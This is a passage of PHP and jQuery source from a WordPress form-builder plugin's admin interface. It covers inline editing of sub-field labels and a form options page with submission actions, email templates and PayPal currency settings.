            span_ui1.parentNode.removeChild(span_ui1);
              
            spinner1 = jQuery( "#"+t+"_elementform_id_temp1" ).spinner();
            spinner1.spinner( "value", spinner_value1 );
                    jQuery( "#"+t+"_elementform_id_temp1" ).spinner({ step: spinner_step});
            
              var myu = t;
            jQuery(document).ready(function() {	

        jQuery("#"+myu+"_mini_label_from").click(function() {
        if (jQuery(this).children('input').length == 0) {
          var from = "<input type='text' id='from' class='from' size='6' style='outline:none; border:none; background:none; font-size:11px;' value=\""+jQuery(this).text()+"\">";
            jQuery(this).html(from);
            jQuery("input.from").focus();
            jQuery("input.from").blur(function() {
          var id_for_blur = document.getElementById('from').parentNode.id.split('_');
          var value = jQuery(this).val();
        jQuery("#"+id_for_blur[0]+"_mini_label_from").text(value);
        });
      }
      });
          
        jQuery("label#"+myu+"_mini_label_to").click(function() {
      if (jQuery(this).children('input').length == 0) {	
      
        var to = "<input type='text' id='to' class='to' size='6' style='outline:none; border:none; background:none; font-size:11px;' value=\""+jQuery(this).text()+"\">";	
          jQuery(this).html(to);			
          jQuery("input.to").focus();					
          jQuery("input.to").blur(function() {	
          var id_for_blur = document.getElementById('to').parentNode.id.split('_');			
          var value = jQuery(this).val();			
          
          jQuery("#"+id_for_blur[0]+"_mini_label_to").text(value);
        });	
         
      }	
      });
      
      
      
      });	
          }	

        else
           if(document.getElementById(t+"_typeform_id_temp").value=="type_name"){
        var myu = t;
            jQuery(document).ready(function() {	

        jQuery("#"+myu+"_mini_label_first").click(function() {		
      
        if (jQuery(this).children('input').length == 0) {	

          var first = "<input type='text' id='first' class='first' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
            jQuery(this).html(first);							
            jQuery("input.first").focus();			
            jQuery("input.first").blur(function() {	
          
          var id_for_blur = document.getElementById('first').parentNode.id.split('_');
          var value = jQuery(this).val();			
        jQuery("#"+id_for_blur[0]+"_mini_label_first").text(value);		
        });	
      }	
      });	    
          
        jQuery("label#"+myu+"_mini_label_last").click(function() {	
      if (jQuery(this).children('input').length == 0) {	
      
        var last = "<input type='text' id='last' class='last'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
          jQuery(this).html(last);			
          jQuery("input.last").focus();					
          jQuery("input.last").blur(function() {	
          var id_for_blur = document.getElementById('last').parentNode.id.split('_');			
          var value = jQuery(this).val();			
          
          jQuery("#"+id_for_blur[0]+"_mini_label_last").text(value);	
        });	
         
      }	
      });
      
        jQuery("label#"+myu+"_mini_label_title").click(function() {		
        if (jQuery(this).children('input').length == 0) {				
          var title = "<input type='text' id='title' class='title' size='10' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
            jQuery(this).html(title);							
            jQuery("input.title").focus();			
            jQuery("input.title").blur(function() {	
            var id_for_blur = document.getElementById('title').parentNode.id.split('_');
          var value = jQuery(this).val();			


        jQuery("#"+id_for_blur[0]+"_mini_label_title").text(value);		
        });	
      }	
      
      });		


      jQuery("label#"+myu+"_mini_label_middle").click(function() {	
      if (jQuery(this).children('input').length == 0) {		
        var middle = "<input type='text' id='middle' class='middle'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
          jQuery(this).html(middle);			
          jQuery("input.middle").focus();					
          jQuery("input.middle").blur(function() {	
                var id_for_blur = document.getElementById('middle').parentNode.id.split('_');			
          var value = jQuery(this).val();			
          
          jQuery("#"+id_for_blur[0]+"_mini_label_middle").text(value);	
        });	
      }	
      });
      
      });		
         }						
        else
           if(document.getElementById(t+"_typeform_id_temp").value=="type_address"){
        var myu = t;
           
      jQuery(document).ready(function() {		
      jQuery("label#"+myu+"_mini_label_street1").click(function() {			

        if (jQuery(this).children('input').length == 0) {				
        var street1 = "<input type='text' id='street1' class='street1' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(street1);					
        jQuery("input.street1").focus();		
        jQuery("input.street1").blur(function() {	
        var id_for_blur = document.getElementById('street1').parentNode.id.split('_');
        var value = jQuery(this).val();			
        jQuery("#"+id_for_blur[0]+"_mini_label_street1").text(value);		
        });		
        }	
        });		
      
      jQuery("label#"+myu+"_mini_label_street2").click(function() {		
      if (jQuery(this).children('input').length == 0) {		
      var street2 = "<input type='text' id='street2' class='street2'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
      jQuery(this).html(street2);					
      jQuery("input.street2").focus();		
      jQuery("input.street2").blur(function() {	
      var id_for_blur = document.getElementById('street2').parentNode.id.split('_');
      var value = jQuery(this).val();			
      jQuery("#"+id_for_blur[0]+"_mini_label_street2").text(value);		
      });		
      }	
      });	
      
      
      jQuery("label#"+myu+"_mini_label_city").click(function() {	
        if (jQuery(this).children('input').length == 0) {	
        var city = "<input type='text' id='city' class='city'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(city);			
        jQuery("input.city").focus();				
        jQuery("input.city").blur(function() {	
        var id_for_blur = document.getElementById('city').parentNode.id.split('_');		
        var value = jQuery(this).val();		
        jQuery("#"+id_for_blur[0]+"_mini_label_city").text(value);		
      });		
      }	
      });	
      
      jQuery("label#"+myu+"_mini_label_state").click(function() {		
        if (jQuery(this).children('input').length == 0) {	
        var state = "<input type='text' id='state' class='state'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
          jQuery(this).html(state);		
          jQuery("input.state").focus();		
          jQuery("input.state").blur(function() {	
        var id_for_blur = document.getElementById('state').parentNode.id.split('_');					
        var value = jQuery(this).val();			
      jQuery("#"+id_for_blur[0]+"_mini_label_state").text(value);	
      });	
      }
      });		

      jQuery("label#"+myu+"_mini_label_postal").click(function() {		
      if (jQuery(this).children('input').length == 0) {			
      var postal = "<input type='text' id='postal' class='postal'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
      jQuery(this).html(postal);			
      jQuery("input.postal").focus();			
      jQuery("input.postal").blur(function() {
        var id_for_blur = document.getElementById('postal').parentNode.id.split('_');	
      var value = jQuery(this).val();		
      jQuery("#"+id_for_blur[0]+"_mini_label_postal").text(value);		
      });	
      }
      });	
      
      
      jQuery("label#"+myu+"_mini_label_country").click(function() {		
        if (jQuery(this).children('input').length == 0) {		
          var country = "<input type='country' id='country' class='country'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
          jQuery(this).html(country);		
          jQuery("input.country").focus();	
          jQuery("input.country").blur(function() {	
          var id_for_blur = document.getElementById('country').parentNode.id.split('_');				
          var value = jQuery(this).val();			
          jQuery("#"+id_for_blur[0]+"_mini_label_country").text(value);			
          });	
        }	
      });
      });	

         }						
        else
           if(document.getElementById(t+"_typeform_id_temp").value=="type_phone"){
        var myu = t;
          
      jQuery(document).ready(function() {	
      jQuery("label#"+myu+"_mini_label_area_code").click(function() {		
      if (jQuery(this).children('input').length == 0) {		

        var area_code = "<input type='text' id='area_code' class='area_code' size='10' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";		

        jQuery(this).html(area_code);		
        jQuery("input.area_code").focus();		
        jQuery("input.area_code").blur(function() {	
        var id_for_blur = document.getElementById('area_code').parentNode.id.split('_');
        var value = jQuery(this).val();			
        jQuery("#"+id_for_blur[0]+"_mini_label_area_code").text(value);		
        });		
      }	
      });	

      
      jQuery("label#"+myu+"_mini_label_phone_number").click(function() {		

      if (jQuery(this).children('input').length == 0) {			
        var phone_number = "<input type='text' id='phone_number' class='phone_number'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";						

        jQuery(this).html(phone_number);					

        jQuery("input.phone_number").focus();			
        jQuery("input.phone_number").blur(function() {		
        var id_for_blur = document.getElementById('phone_number').parentNode.id.split('_');
        var value = jQuery(this).val();			
        jQuery("#"+id_for_blur[0]+"_mini_label_phone_number").text(value);		
        });	
      }	
      });
      
      });	
         }						
        else
           if(document.getElementById(t+"_typeform_id_temp").value=="type_date_fields"){
        var myu = t;
          
      jQuery(document).ready(function() {
      jQuery("label#"+myu+"_day_label").click(function() {		
        if (jQuery(this).children('input').length == 0) {				
          var day = "<input type='text' id='day' class='day' size='8' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
            jQuery(this).html(day);							
            jQuery("input.day").focus();			
            jQuery("input.day").blur(function() {	
          var id_for_blur = document.getElementById('day').parentNode.id.split('_');
          var value = jQuery(this).val();			

        jQuery("#"+id_for_blur[0]+"_day_label").text(value);		
        });	
      }	
      });		


      jQuery("label#"+myu+"_month_label").click(function() {	
      if (jQuery(this).children('input').length == 0) {		
        var month = "<input type='text' id='month' class='month' size='8' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
          jQuery(this).html(month);			
          jQuery("input.month").focus();					
          jQuery("input.month").blur(function() {	
          var id_for_blur = document.getElementById('month').parentNode.id.split('_');			
          var value = jQuery(this).val();			
          
          jQuery("#"+id_for_blur[0]+"_month_label").text(value);	
        });	
      }	
      });
      
        jQuery("label#"+myu+"_year_label").click(function() {	
      if (jQuery(this).children('input').length == 0) {		
        var year = "<input type='text' id='year' class='year' size='8' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
          jQuery(this).html(year);			
          jQuery("input.year").focus();					
          jQuery("input.year").blur(function() {	
        var id_for_blur = document.getElementById('year').parentNode.id.split('_');				
          var value = jQuery(this).val();			
          
          jQuery("#"+id_for_blur[0]+"_year_label").text(value);	
        });	
      }	
      });
      
      });	

      
         }						
          else
           if(document.getElementById(t+"_typeform_id_temp").value=="type_time"){
        var myu = t;
          
    jQuery(document).ready(function() {	
      jQuery("label#"+myu+"_mini_label_hh").click(function() {		
        if (jQuery(this).children('input').length == 0) {				
          var hh = "<input type='text' id='hh' class='hh' size='4' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
            jQuery(this).html(hh);							
            jQuery("input.hh").focus();			
            jQuery("input.hh").blur(function() {	
            var id_for_blur = document.getElementById('hh').parentNode.id.split('_');	
          var value = jQuery(this).val();			


        jQuery("#"+id_for_blur[0]+"_mini_label_hh").text(value);		
        });	
      }	
      });		


      jQuery("label#"+myu+"_mini_label_mm").click(function() {	
      if (jQuery(this).children('input').length == 0) {		
        var mm = "<input type='text' id='mm' class='mm' size='4' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
          jQuery(this).html(mm);			
          jQuery("input.mm").focus();					
          jQuery("input.mm").blur(function() {
                var id_for_blur = document.getElementById('mm').parentNode.id.split('_');				
          var value = jQuery(this).val();			
          
          jQuery("#"+id_for_blur[0]+"_mini_label_mm").text(value);	
        });	
      }	
      });
      
        jQuery("label#"+myu+"_mini_label_ss").click(function() {	
      if (jQuery(this).children('input').length == 0) {		
        var ss = "<input type='text' id='ss' class='ss' size='4' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
          jQuery(this).html(ss);			
          jQuery("input.ss").focus();					
          jQuery("input.ss").blur(function() {
       var id_for_blur = document.getElementById('ss').parentNode.id.split('_');				
          var value = jQuery(this).val();			
          
          jQuery("#"+id_for_blur[0]+"_mini_label_ss").text(value);	
        });	
      }	
      });
      
        jQuery("label#"+myu+"_mini_label_am_pm").click(function() {		
        if (jQuery(this).children('input').length == 0) {				
          var am_pm = "<input type='text' id='am_pm' class='am_pm' size='4' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
            jQuery(this).html(am_pm);							
            jQuery("input.am_pm").focus();			
            jQuery("input.am_pm").blur(function() {	
            var id_for_blur = document.getElementById('am_pm').parentNode.id.split('_');	
          var value = jQuery(this).val();			

        jQuery("#"+id_for_blur[0]+"_mini_label_am_pm").text(value);		
        });	
      }	
      });	
      });
        
         }	

        else
           if(document.getElementById(t+"_typeform_id_temp").value=="type_paypal_price"){
        var myu = t;
            jQuery(document).ready(function() {	

        jQuery("#"+myu+"_mini_label_dollars").click(function() {		
      
        if (jQuery(this).children('input').length == 0) {	

          var dollars = "<input type='text' id='dollars' class='dollars' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
            jQuery(this).html(dollars);							
            jQuery("input.dollars").focus();			
            jQuery("input.dollars").blur(function() {	
          
          var id_for_blur = document.getElementById('dollars').parentNode.id.split('_');
          var value = jQuery(this).val();			
        jQuery("#"+id_for_blur[0]+"_mini_label_dollars").text(value);		
        });	
      }	
      });	    
          
        jQuery("label#"+myu+"_mini_label_cents").click(function() {	
      if (jQuery(this).children('input').length == 0) {	
      
        var cents = "<input type='text' id='cents' class='cents'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
          jQuery(this).html(cents);			
          jQuery("input.cents").focus();					
          jQuery("input.cents").blur(function() {	
          var id_for_blur = document.getElementById('cents').parentNode.id.split('_');			
          var value = jQuery(this).val();			
          
          jQuery("#"+id_for_blur[0]+"_mini_label_cents").text(value);	
        });	
         
      }	
      });
      });
      }
      else
           if(document.getElementById(t+"_typeform_id_temp").value=="type_scale_rating"){
        var myu = t;
            jQuery(document).ready(function() {	

        jQuery("#"+myu+"_mini_label_worst").click(function() {		
      
        if (jQuery(this).children('input').length == 0) {	

          var worst = "<input type='text' id='worst' class='worst' size='6' style='outline:none; border:none; background:none; font-size:11px;' value=\""+jQuery(this).text()+"\">";	
            jQuery(this).html(worst);							
            jQuery("input.worst").focus();			
            jQuery("input.worst").blur(function() {	
          
          var id_for_blur = document.getElementById('worst').parentNode.id.split('_');
          var value = jQuery(this).val();			
        jQuery("#"+id_for_blur[0]+"_mini_label_worst").text(value);		
        });	
      }	
      });	    
          
        jQuery("label#"+myu+"_mini_label_best").click(function() {	
      if (jQuery(this).children('input').length == 0) {	
      
        var best = "<input type='text' id='best' class='best' size='6' style='outline:none; border:none; background:none; font-size:11px;' value=\""+jQuery(this).text()+"\">";	
          jQuery(this).html(best);			
          jQuery("input.best").focus();					
          jQuery("input.best").blur(function() {	
          var id_for_blur = document.getElementById('best').parentNode.id.split('_');			
          var value = jQuery(this).val();			
          
          jQuery("#"+id_for_blur[0]+"_mini_label_best").text(value);	
        });	
         
      }	
      });
      
      
      
      });		
       }
          }
          form_view = 1;
          form_view_count = 0;
          for (i = 1; i <= 30; i++) {
            if (document.getElementById('form_id_tempform_view'+i)) {
              form_view_count++;
              form_view_max=i;
            }
          }
          if (form_view_count > 1) {
            for (i=1; i<=form_view_max; i++) {
              if (document.getElementById('form_id_tempform_view'+i)) {
                first_form_view=i;
                break;
              }
            }
            form_view=form_view_max;
            generate_page_nav(first_form_view);
            var img_EDIT = document.createElement("img");
            img_EDIT.setAttribute("src", "<?php echo WD_FMC_URL . '/images/edit.png'; ?>");
            img_EDIT.style.cssText = "margin-left:40px; cursor:pointer";
            img_EDIT.setAttribute("onclick", 'el_page_navigation()');
            var td_EDIT = document.getElementById("edit_page_navigation");
            td_EDIT.appendChild(img_EDIT);
            document.getElementById('page_navigation').appendChild(td_EDIT);
          }
          //if(document.getElementById('take').innerHTML.indexOf('up_row(')==-1) location.reload(true);
          //else 
          
          document.getElementById('form').value=document.getElementById('take').innerHTML;
          document.getElementById('araqel').value = 1;
        }
        jQuery(window).load(function () {
          formOnload();
        });
      </script>

      <input type="hidden" name="option" value="com_formmaker" />
      <input type="hidden" name="id" value="<?php echo $row->id; ?>" />
      <input type="hidden" name="cid[]" value="<?php echo $row->id; ?>" />

      <input type="hidden" id="task" name="task" value=""/>
      <input type="hidden" id="current_id" name="current_id" value="<?php echo $row->id; ?>" />
    </form>
    <script>
      jQuery(window).load(function() {
        fm_popup();
      });
    </script>
    <?php
  }

  public function form_options_old($id) {
    $row = $this->model->get_row_data($id);
    $themes = $this->model->get_theme_rows_data('_old');
    $page_title = $row->title . ' form options';
    $label_id = array();
    $label_label = array();
    $label_type = array();
    $label_all = explode('#****#', $row->label_order_current);
    $label_all = array_slice($label_all, 0, count($label_all) - 1);
    foreach ($label_all as $key => $label_each) {
      $label_id_each = explode('#**id**#', $label_each);
      array_push($label_id, $label_id_each[0]);
      $label_order_each = explode('#**label**#', $label_id_each[1]);
      array_push($label_label, $label_order_each[0]);
      array_push($label_type, $label_order_each[1]);
    }
    ?>
    <script>
      gen = "<?php echo $row->counter; ?>";
      form_view_max = 20;
      function set_preview() {
        document.getElementById('preview_form').href = '<?php echo add_query_arg(array('action' => 'FormMakerPreview_fmc', 'form_id' => $row->id), admin_url('admin-ajax.php')); ?>&id='+document.getElementById('theme').value+'&width=1000&height=500&TB_iframe=1';
      }
    </script>
    <div style="font-size: 14px; font-weight: bold;">
        This section allows you to edit form options.
        <a style="color: blue; text-decoration: none;" target="_blank" href="https://web-dorado.com/wordpress-form-maker-guide-3.html">Read More in User Manual</a>
      </div>
    <form class="wrap" method="post" action="admin.php?page=manage_fmc" style="width:99%;" name="adminForm" id="adminForm">
      <?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
      <h2><?php echo $page_title; ?></h2>
      <div style="float: right; margin: 0 5px 0 0;">
        <input class="button-secondary" type="submit" onclick="if (fm_check_email('mail') ||
                                                                   fm_check_email('from_mail') ||
                                                                   fm_check_email('paypal_email')) {return false;}; fm_set_input_value('task', 'save_options_old')" value="Save"/>
        <input class="button-secondary" type="submit" onclick="if (fm_check_email('mail') ||
                                                                   fm_check_email('from_mail') ||
                                                                   fm_check_email('paypal_email')) {return false;}; fm_set_input_value('task', 'apply_options_old')" value="Apply"/>
        <input class="button-secondary" type="submit" onclick="fm_set_input_value('task', 'cancel_options_old')" value="Cancel"/>
      </div>
      <input type="hidden" name="take" id="take" value="<?php $row->form ?>">
      <div class="submenu-box" style="width: 99%; float: left; margin: 15px 0 0 0;">
        <div class="submenu-pad">
          <ul id="submenu" class="configuration">
            <li>
              <a id="general" class="fm_fieldset_tab" onclick="form_maker_options_tabs('general')" href="#">General Options</a>
            </li>
            <li>
              <a id="actions" class="fm_fieldset_tab" onclick="form_maker_options_tabs('actions')" href="#">Actions after Submission</a>
            </li>
            <li>
              <a id="payment" class="fm_fieldset_tab" onclick="form_maker_options_tabs('payment')" href="#">Payment Options</a>
            </li>
            <li>
              <a id="javascript" class="fm_fieldset_tab" onclick="form_maker_options_tabs('javascript')" href="#">JavaScript</a>
            </li>
            <li>
              <a id="custom" class="fm_fieldset_tab" onclick="form_maker_options_tabs('custom')" href="#">Custom Text in Email</a>
            </li>
          </ul>
        </div>
      </div>
      <fieldset id="actions_fieldset" class="adminform fm_fieldset_deactive">
        <legend style="color:#0B55C4;font-weight: bold;">Actions after submission</legend>
        <table class="admintable">
          <tr valign="top">
            <td class="fm_options_label">
              <label>Action type</label>
            </td>
            <td class="fm_options_value">
              <div><input type="radio" name="submit_text_type" id="text_type_none" onclick="set_type('none')" value="1" <?php echo ($row->submit_text_type != 2 && $row->submit_text_type != 3 && $row->submit_text_type != 4 && $row->submit_text_type != 5) ? "checked" : ""; ?> /><label for="text_type_none">Stay on Form</label></div>
              <div><input type="radio" name="submit_text_type" id="text_type_post" onclick="set_type('post')" value="2" <?php echo ($row->submit_text_type == 2) ? "checked" : ""; ?> /><label for="text_type_post">Post</label></label></div>
              <div><input type="radio" name="submit_text_type" id="text_type_page" onclick="set_type('page')" value="5" <?php echo ($row->submit_text_type == 5) ? "checked" : ""; ?> /><label for="text_type_page">Page</label></label></div>
              <div><input type="radio" name="submit_text_type" id="text_type_custom_text" onclick="set_type('custom_text')" value="3" <?php echo ($row->submit_text_type == 3 ) ? "checked" : ""; ?> /><label for="text_type_custom_text">Custom Text</label></label></div>
              <div><input type="radio" name="submit_text_type" id="text_type_url" onclick="set_type('url')" value="4" <?php echo ($row->submit_text_type == 4) ? "checked" : ""; ?> /><label for="text_type_url">URL</div>
            </td>
          </tr>
			<tr id="none" <?php echo (($row->submit_text_type == 2 || $row->submit_text_type == 3 || $row->submit_text_type == 4 || $row->submit_text_type == 5) ? 'style="display:none"' : ''); ?>>
				<td class="fm_options_label">
				  <label>Stay on Form</label>
				</td>
				<td class="fm_options_value">
				  <img src="<?php echo WD_FMC_URL . '/images/tick.png'; ?>" border="0">
				</td>
			</tr>
			<tr id="post" <?php echo (($row->submit_text_type != 2) ? 'style="display:none"' : ''); ?>>
				<td class="fm_options_label">
					<label for="post_name">Post</label>
				</td>
				<td class="fm_options_value">
					<select id="post_name" name="post_name">
						<option value="0">- Select Post -</option>
						<?php
						// The Query.
						$args = array('posts_per_page'  => 10000);
						query_posts($args);
						// The Loop.
						while (have_posts()) : the_post(); ?>
						<option value="<?php $x = get_permalink(get_the_ID()); echo $x; ?>" <?php echo (($row->article_id == $x) ? 'selected="selected"' : ''); ?>><?php the_title(); ?></option>
						<?php
						endwhile;
						// Reset Query.
						wp_reset_query();
						?>
					</select>
				</td>
			</tr>
			<tr id="page" <?php echo (($row->submit_text_type != 5) ? 'style="display:none"' : ''); ?>>
				<td class="fm_options_label">
					<label for="page_name">Page</label>
				</td>
				<td class="fm_options_value">
					<select id="page_name" name="page_name" style="width:153px; font-size:11px;">
						<option value="0">- Select Page -</option>
						<?php
						// The Query.
						$pages = get_pages();
						// The Loop.
						foreach ($pages as $page) {
						  $page_id = get_page_link($page->ID);
						  ?>
						<option value="<?php echo $page_id; ?>" <?php echo (($row->article_id == $page_id) ? 'selected="selected"' : ''); ?>><?php echo $page->post_title; ?></option>
						  <?php
						}
						// Reset Query.
						wp_reset_query();
						?>
					</select>
				</td>
			</tr>
			<tr id="custom_text" <?php echo (($row->submit_text_type != 3) ? 'style="display: none;"' : ''); ?>>
				<td class="fm_options_label">
					<label for="submit_text">Text</label>
				</td>
				<td class="fm_options_value">
					<?php
					if (user_can_richedit()) {
						wp_editor($row->submit_text, 'submit_text', array('teeny' => FALSE, 'textarea_name' => 'submit_text', 'media_buttons' => FALSE, 'textarea_rows' => 5));
					}
					else {
						?>
						<textarea cols="36" rows="5" id="submit_text" name="submit_text" style="resize: vertical;">
							<?php echo $row->submit_text; ?>
						</textarea>
						<?php
					}
					?>
				</td>
			</tr>
			<tr id="url" <?php echo (($row->submit_text_type != 4 ) ? 'style="display:none"' : ''); ?>>
				<td class="fm_options_label">
					<label for="url">URL</label>
				</td>
				<td class="fm_options_value">
					<input type="text" id="url" name="url" style="width:300px" value="<?php echo $row->url; ?>" />
				</td>
			</tr>
        </table>
		</fieldset>
      <fieldset id="custom_fieldset" class="adminform fm_fieldset_deactive">
        <legend style="color:#0B55C4;font-weight: bold;">Custom text in email</legend>
        <table class="admintable">
          <tr>
            <td class="fm_options_label" valign="top">
              <label>For Administrator</label>
            </td>
            <td class="fm_options_value">
              <div style="margin-bottom:5px">
                <?php
                $choise = "document.getElementById('script_mail')";
                for ($i = 0; $i < count($label_label); $i++) {
                  if ($label_type[$i] == "type_submit_reset" || $label_type[$i] == "type_editor" || $label_type[$i] == "type_map" || $label_type[$i] == "type_mark_map" || $label_type[$i] == "type_captcha" || $label_type[$i] == "type_recaptcha" || $label_type[$i] == "type_button") {
                    continue;
                  }
                  $param = htmlspecialchars(addslashes($label_label[$i]));
                  ?>
                  <input style="border: 1px solid silver; font-size: 10px;" type="button" value="<?php echo htmlspecialchars(addslashes($label_label[$i])); ?>" onClick="insertAtCursor(<?php echo $choise; ?>, '<?php echo $param; ?>')" />
                  <?php
                }
                ?>
                <input style="border: 1px solid silver; font-size: 10px; margin: 3px;" type="button" value="All fields list" onClick="insertAtCursor(<?php echo $choise; ?>, 'all')" />
              </div>
              <?php
              if (user_can_richedit()) {
                wp_editor($row->script_mail, 'script_mail', array('teeny' => FALSE, 'textarea_name' => 'script_mail', 'media_buttons' => FALSE, 'textarea_rows' => 5));
              }
              else {
                ?>
                <textarea name="script_mail" id="script_mail" cols="20" rows="10" style="width:300px; height:450px;"><?php echo $row->script_mail; ?></textarea>
                <?php
              }
              ?>
            </td>
          </tr>
          <tr>
            <td valign="top" height="30"></td>
            <td valign="top"></td>
          </tr>
          <tr>
            <td class="fm_options_label" valign="top">
              <label>For User</label>
            </td>
            <td class="fm_options_value">
              <div style="margin-bottom:5px">
                <?php
                $choise = "document.getElementById('script_mail_user')";
                for ($i = 0; $i < count($label_label); $i++) {
                  if ($label_type[$i] == "type_submit_reset" || $label_type[$i] == "type_editor" || $label_type[$i] == "type_map" || $label_type[$i] == "type_mark_map" || $label_type[$i] == "type_captcha" || $label_type[$i] == "type_recaptcha" || $label_type[$i] == "type_button") {
                    continue;
                  }
                  $param = htmlspecialchars(addslashes($label_label[$i]));
                  ?>
                  <input style="border: 1px solid silver; font-size: 10px;" type="button" value="<?php echo htmlspecialchars(addslashes($label_label[$i])); ?>" onClick="insertAtCursor(<?php echo $choise; ?>, '<?php echo $param; ?>')" />
                  <?php
                }
                ?>
                <input style="border: 1px solid silver; font-size: 10px; margin:3px;" type="button" value="All fields list" onClick="insertAtCursor(<?php echo $choise; ?>, 'all')" />
              </div>
              <?php
              if (user_can_richedit()) {
                wp_editor($row->script_mail_user, 'script_mail_user', array('teeny' => FALSE, 'textarea_name' => 'script_mail_user', 'media_buttons' => FALSE, 'textarea_rows' => 5));
              }
              else {
                ?>
                <textarea name="script_mail_user" id="script_mail_user" cols="20" rows="10" style="width:300px; height:450px;"><?php echo $row->script_mail_user; ?></textarea>
                <?php
              }
              ?>
            </td>
          </tr>
        </table>
      </fieldset>
      <fieldset id="general_fieldset" class="adminform fm_fieldset_deactive">
        <legend style="color:#0B55C4;font-weight: bold;">General Options</legend>
        <table class="admintable" style="float:left">
          <tr valign="top">
            <td class="fm_options_label">
              <label for="mail">Email to send submissions to</label>
            </td>
            <td class="fm_options_value">
              <input id="mail" name="mail" value="<?php echo $row->mail; ?>" style="width:250px;" />
            </td>
          </tr>
          <tr valign="top">
            <td class="fm_options_label">
              <label for="from_mail">From Email</label>
            </td>
            <td class="fm_options_value">
              <input id="from_mail" name="from_mail" value="<?php echo $row->from_mail; ?>" style="width:250px;" />
            </td>
          </tr>
          <tr valign="top">
            <td class="fm_options_label">
              <label for="from_name">From Name</label>
            </td>
            <td class="fm_options_value">
              <input id="from_name" name="from_name" value="<?php echo $row->from_name; ?>" style="width:250px;"/>
            </td>
          </tr>
          <tr valign="top">
            <td class="fm_options_label">
              <label for="theme">Theme</label>
            </td>
            <td class="fm_options_value">
              <select id="theme" name="theme" style="width:260px;" onChange="set_preview()">
                <?php
                foreach ($themes as $theme) {
                  ?>
                  <option value="<?php echo $theme->id; ?>" <?php echo (($theme->id == $row->theme) ? 'selected' : ''); ?>><?php echo $theme->title; ?></option>
                  <?php
                }
                ?>
              </select>
              <a href="<?php echo add_query_arg(array('action' => 'FormMakerPreview_fmc', 'id' => $row->theme, 'form_id' => $row->id, 'width' => '1000', 'height' => '500', 'TB_iframe' => '1'), admin_url('admin-ajax.php')); ?>" class="button-primary thickbox thickbox-preview" id="preview_form" title="Form Preview" onclick="return false;">
                Preview
              </a>
            </td>
          </tr>
        </table>
      </fieldset>
      <fieldset id="payment_fieldset" class="adminform fm_fieldset_deactive">
        <legend style="color:#0B55C4;font-weight: bold;">Payment Options</legend>
        <table class="admintable">
          <tr valign="top">
            <td class="fm_options_label">
              <label>Turn Paypal On</label>
            </td>
            <td class="fm_options_value">
              <div><input type="radio" name="paypal_mode" id="paypal_mode1" value="1" <?php echo ($row->paypal_mode == "1") ? "checked" : ""; ?> /><label for="paypal_mode1">On</label></div>
              <div><input type="radio" name="paypal_mode" id="paypal_mode2" value="0" <?php echo ($row->paypal_mode != "1") ? "checked" : ""; ?> /><label for="paypal_mode2">Off</label></div>
            </td>
          </tr>
          <tr valign="top">
            <td class="fm_options_label">
              <label>Checkout Mode</label>
            </td>
            <td class="fm_options_value">
              <div><input type="radio" name="checkout_mode" id="checkout_mode1" value="production" <?php echo ($row->checkout_mode == "production") ? "checked" : ""; ?> /><label for="checkout_mode1">Production</label></div>
              <div><input type="radio" name="checkout_mode" id="checkout_mode2" value="testmode" <?php echo ($row->checkout_mode != "production") ? "checked" : ""; ?> /><label for="checkout_mode2">Testmode</label></div>
            </td>
          </tr>
          <tr valign="top">
            <td class="fm_options_label">
              <label for="paypal_email">Paypal email</label>
            </td>
            <td class="fm_options_value">
              <input type="text" name="paypal_email" id="paypal_email" value="<?php echo $row->paypal_email; ?>" class="text_area" style="width:250px">
            </td>
          </tr>
          <tr valign="top">
            <td class="fm_options_label">
              <label for="payment_currency">Payment Currency</label>
            </td>
            <td class="fm_options_value">
              <select id="payment_currency" name="payment_currency" style="width:253px">
                <option value="USD" <?php echo (($row->payment_currency == 'USD') ? 'selected' : ''); ?>>$ &#8226; U.S. Dollar</option>
                <option value="EUR" <?php echo (($row->payment_currency == 'EUR') ? 'selected' : ''); ?>>&#8364; &#8226; Euro</option>
                <option value="GBP" <?php echo (($row->payment_currency == 'GBP') ? 'selected' : ''); ?>>&#163; &#8226; Pound Sterling</option>
                <option value="JPY" <?php echo (($row->payment_currency == 'JPY') ? 'selected' : ''); ?>>&#165; &#8226; Japanese Yen</option>
                <option value="CAD" <?php echo (($row->payment_currency == 'CAD') ? 'selected' : ''); ?>>C$ &#8226; Canadian Dollar</option>
                <option value="MXN" <?php echo (($row->payment_currency == 'MXN') ? 'selected' : ''); ?>>Mex$ &#8226; Mexican Peso</option>
                <option value="HKD" <?php echo (($row->payment_currency == 'HKD') ? 'selected' : ''); ?>>HK$ &#8226; Hong Kong Dollar</option>
                <option value="HUF" <?php echo (($row->payment_currency == 'HUF') ? 'selected' : ''); ?>>Ft &#8226; Hungarian Forint</option>
                <option value="NOK" <?php echo (($row->payment_currency == 'NOK') ? 'selected' : ''); ?>>kr &#8226; Norwegian Kroner</option>
                <option value="NZD" <?php echo (($row->payment_currency == 'NZD') ? 'selected' : ''); ?>>NZ$ &#8226; New Zealand Dollar</option>
                <option value="SGD" <?php echo (($row->payment_currency == 'SGD') ? 'selected' : ''); ?>>S$ &#8226; Singapore Dollar</option>
